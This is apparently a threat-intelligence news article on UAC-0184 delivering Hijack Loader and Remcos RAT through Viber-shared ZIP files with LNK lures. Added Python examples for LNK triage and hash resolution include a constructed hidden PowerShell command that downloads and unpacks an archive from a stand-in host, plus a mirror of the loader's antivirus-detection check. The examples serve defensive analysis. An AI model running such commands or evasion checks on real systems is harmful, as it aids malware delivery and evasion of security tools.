
The Russia-aligned threat actor tracked as UAC-0184 has been observed using the Viber messaging platform to distribute malicious ZIP archives to Ukrainian military and government entities.
"This organization has continued to conduct high-intensity intelligence gathering activities against Ukrainian military and government departments in 2025," the 360 Threat Intelligence Center stated in a technical assessment. "These activities have been ongoing since 2025."
The group, also tracked as Hive0156, is best known for using war-themed lures in phishing emails to deploy Hijack Loader against Ukrainian targets; the loader then serves as the delivery mechanism for Remcos RAT.
CERT-UA first documented the threat actor in early January 2024. Subsequent campaigns have been found to use messaging applications such as Signal and Telegram to distribute malware, and the latest findings from the Chinese security vendor indicate that this tradecraft has evolved further.
In the newly observed attack chain, Viber serves as the initial access vector: the distributed ZIP archives contain several Windows shortcut (LNK) files disguised as legitimate Microsoft Word and Excel documents to trick recipients into opening them.
When opened, each LNK file displays a decoy document to the victim to lower suspicion while a PowerShell script silently retrieves a second ZIP archive (named "smoothieks.zip") from a remote server and executes Hijack Loader in the background.
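The shortcut lure described above is easy to triage offline once the LNK is parsed: a document-themed shortcut whose real target is a script host, whose arguments fetch or unpack an archive, and whose icon is borrowed from an Office binary. The following is an added example, not code from the report or from the actors' tooling: a minimal MS-SHLLINK string-data parser plus a triage function, run against two constructed shortcuts (the download URL, command line and paths are invented; only the archive name "smoothieks.zip" is taken from the report). The parser reads only the header, IDList, LinkInfo and StringData sections, which is enough for this check; real samples sometimes carry the target solely inside the IDList, which a full-featured tool would also resolve.

```python
import re
import struct

# Shell Link (.lnk) header constants from MS-SHLLINK.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
# StringData fields, in the order the format stores them.
STRING_FIELDS = [("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION)]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
DOWNLOAD_MARKERS = ("downloadfile", "downloadstring", "invoke-webrequest", "iwr ",
                    "start-bitstransfer", "expand-archive", "http://", "https://",
                    "-enc", "-w hidden", "windowstyle hidden", "frombase64string")


def build_lnk(**fields: str) -> bytes:
    """Emit a minimal Unicode .lnk carrying only StringData (constructed test sample)."""
    flags, body = IS_UNICODE, b""
    for key, bit in STRING_FIELDS:
        if key in fields:
            flags |= bit
            body += struct.pack("<H", len(fields[key])) + fields[key].encode("utf-16-le")
    # HeaderSize, LinkCLSID, LinkFlags, then the remaining fixed header fields zeroed.
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags)
    return header + b"\x00" * (0x4C - len(header)) + body


def parse_lnk(data: bytes) -> dict:
    """Walk header -> IDList -> LinkInfo -> StringData and return the strings."""
    size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:       # IDListSize excludes its own 2 bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                 # LinkInfoSize includes its own 4 bytes
        pos += struct.unpack_from("<I", data, pos)[0]
    width, enc = (2, "utf-16-le") if flags & IS_UNICODE else (1, "cp1252")
    strings = {}
    for key, bit in STRING_FIELDS:
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            strings[key] = data[pos:pos + count * width].decode(enc, "replace")
            pos += count * width
    return strings


def triage_lnk(data: bytes, filename: str = "") -> dict:
    """Flag shortcut traits typical of document-lure LNKs and return the evidence."""
    info = parse_lnk(data)
    target = info.get("relative_path", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    args, icon = info.get("arguments", ""), info.get("icon_location", "").lower()
    findings = []
    if target in SCRIPT_HOSTS:
        findings.append(f"target is script host {target}")
    hits = [m for m in DOWNLOAD_MARKERS if m in args.lower()]
    if hits:
        findings.append("arguments contain " + ", ".join(hits))
    if any(app in icon for app in OFFICE_APPS) and target not in OFFICE_APPS:
        findings.append("Office icon borrowed by a non-Office target")
    if re.search(r"\.(docx?|xlsx?|pdf)\.lnk$", filename, re.I):
        findings.append("double extension")
    return {"target": target, "arguments": args, "findings": findings,
            "suspicious": bool(findings)}


# Constructed samples: the first mimics the lure described in the article
# (URL and command line are invented; only the archive name comes from the report).
SAMPLE_LURE = build_lnk(
    relative_path=r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    working_dir=r"C:\Windows\System32",
    arguments=r'-w hidden -c "iwr https://example.invalid/smoothieks.zip -OutFile $env:TEMP\s.zip; Expand-Archive $env:TEMP\s.zip $env:TEMP\s"',
    icon_location=r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
)
SAMPLE_BENIGN = build_lnk(
    relative_path=r"..\..\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    arguments=r'"C:\Users\user\Documents\report.docx"',
    icon_location=r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
)

if __name__ == "__main__":
    for name, blob in (("Report.docx.lnk", SAMPLE_LURE), ("report.lnk", SAMPLE_BENIGN)):
        print(name, triage_lnk(blob, name))
```

The marker list is deliberately broad (any web fetch, archive expansion, hidden window or encoded command); on a real triage queue the arguments string is what you pivot on, since the decoy document the shortcut opens looks entirely legitimate.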

The attack evades security solutions through techniques such as DLL side-loading and module stomping, reconstructing and deploying Hijack Loader in memory in a multi-stage process. The loader then checks the environment for installed security software, including products from Kaspersky, Avast, Bitdefender, AVG, Emsisoft, Webroot, and Microsoft, by computing CRC32 hashes of the application names it finds and comparing them against a list carried in the malware.
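Hashing names rather than storing them is a common way for a loader to hide which products it looks for, so the analyst's job is to turn the extracted hash table back into names. The following is an added example, not the report's or the loader's code: a small resolver that hashes a candidate list of vendor process names under several plausible normalizations (case, with and without extension, ANSI and UTF-16) and reports which embedded values it can explain, alongside a function that mirrors the loader-side lookup. The "embedded" hash table here is constructed by hashing lowercase names so the example runs offline; the real loader's constants, its exact normalization, and the process names chosen as candidates are all assumptions.

```python
import zlib


def crc32(data: bytes) -> int:
    return zlib.crc32(data) & 0xFFFFFFFF


def name_variants(name: str):
    """Yield (label, bytes) for the normalizations a loader plausibly hashes."""
    stem = name.rsplit(".", 1)[0]
    forms = {"as-is": name, "lower": name.lower(), "upper": name.upper(),
             "stem": stem, "stem-lower": stem.lower()}
    for label, text in forms.items():
        yield label + "/ansi", text.encode("ascii", "replace")
        yield label + "/utf-16le", text.encode("utf-16-le")


def resolve_hashes(embedded: set, candidates: list) -> tuple:
    """Map each embedded CRC32 back to a candidate process name, if any."""
    resolved = {}
    for name in candidates:
        for label, data in name_variants(name):
            h = crc32(data)
            if h in embedded and h not in resolved:
                resolved[h] = (name, label)
    return resolved, embedded - set(resolved)


def loader_style_check(running: list, embedded: set) -> list:
    """Mirror of the loader-side check: hash each process name, look it up."""
    return [p for p in running if crc32(p.lower().encode("ascii", "replace")) in embedded]


# Constructed stand-in for a hash table extracted from a sample: these values are
# produced here by hashing lowercase names and are NOT the real loader's constants.
EMBEDDED_HASHES = {crc32(n.lower().encode()) for n in
                   ["avp.exe", "AvastSvc.exe", "bdagent.exe", "MsMpEng.exe", "a2service.exe"]}
EMBEDDED_HASHES.add(0xDEADBEEF)  # one value no candidate will explain

# Candidate list an analyst would assemble from the vendors named in the report
# (typical service/process names for those products; assumed, not from the sample).
CANDIDATES = ["avp.exe", "AvastSvc.exe", "AVGSvc.exe", "bdagent.exe", "vsserv.exe",
              "a2service.exe", "WRSA.exe", "MsMpEng.exe", "explorer.exe"]

if __name__ == "__main__":
    resolved, unresolved = resolve_hashes(EMBEDDED_HASHES, CANDIDATES)
    for h, (name, how) in sorted(resolved.items()):
        print(f"{h:08x} -> {name} ({how})")
    print("unresolved:", [f"{h:08x}" for h in unresolved])
    print("loader would see:", loader_style_check(["explorer.exe", "MsMpEng.exe"], EMBEDDED_HASHES))
```

The variant labels matter: if every hit resolves under the same normalization (here lowercase ANSI), that tells you how the loader preprocesses names before hashing, which is what you need to extend the candidate list and to write a matching detection for the unresolved entries.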
The loader also establishes persistence via scheduled tasks and takes steps to evade static signature detection before covertly running Remcos RAT by injecting it into "chime.exe." The remote administration tool gives attackers control of the endpoint and the ability to run payloads, monitor activity, and steal data.
"Although marketed as legitimate system management software, its powerful intrusive capabilities make it frequently used by various malicious attackers for cyber espionage and data theft activities," according to the 360 Threat Intelligence Center's statement. "Through the graphical user interface (GUI) control panel provided by Remcos, attackers can perform batch automated management or precise manual interactive operations on the victim's host."
